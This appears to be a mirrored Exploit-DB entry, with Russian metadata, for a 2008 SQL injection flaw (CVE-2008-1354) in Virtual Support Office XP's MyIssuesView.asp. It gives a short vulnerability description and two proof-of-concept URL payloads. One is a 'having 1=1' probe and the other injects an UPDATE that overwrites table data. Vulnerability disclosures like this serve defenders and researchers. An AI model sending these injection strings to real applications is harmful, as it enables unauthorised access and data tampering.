Exploit Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection

[Exploiter]

EDB-ID

31404

Проверка EDB

1. Пройдено

Автор

THE-0UTL4W

Тип уязвимости

WEBAPPS

Платформа

ASP

CVE

cve-2008-1354

Дата публикации

2008-03-13

source: https://www.securityfocus.com/bid/28247/info

Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--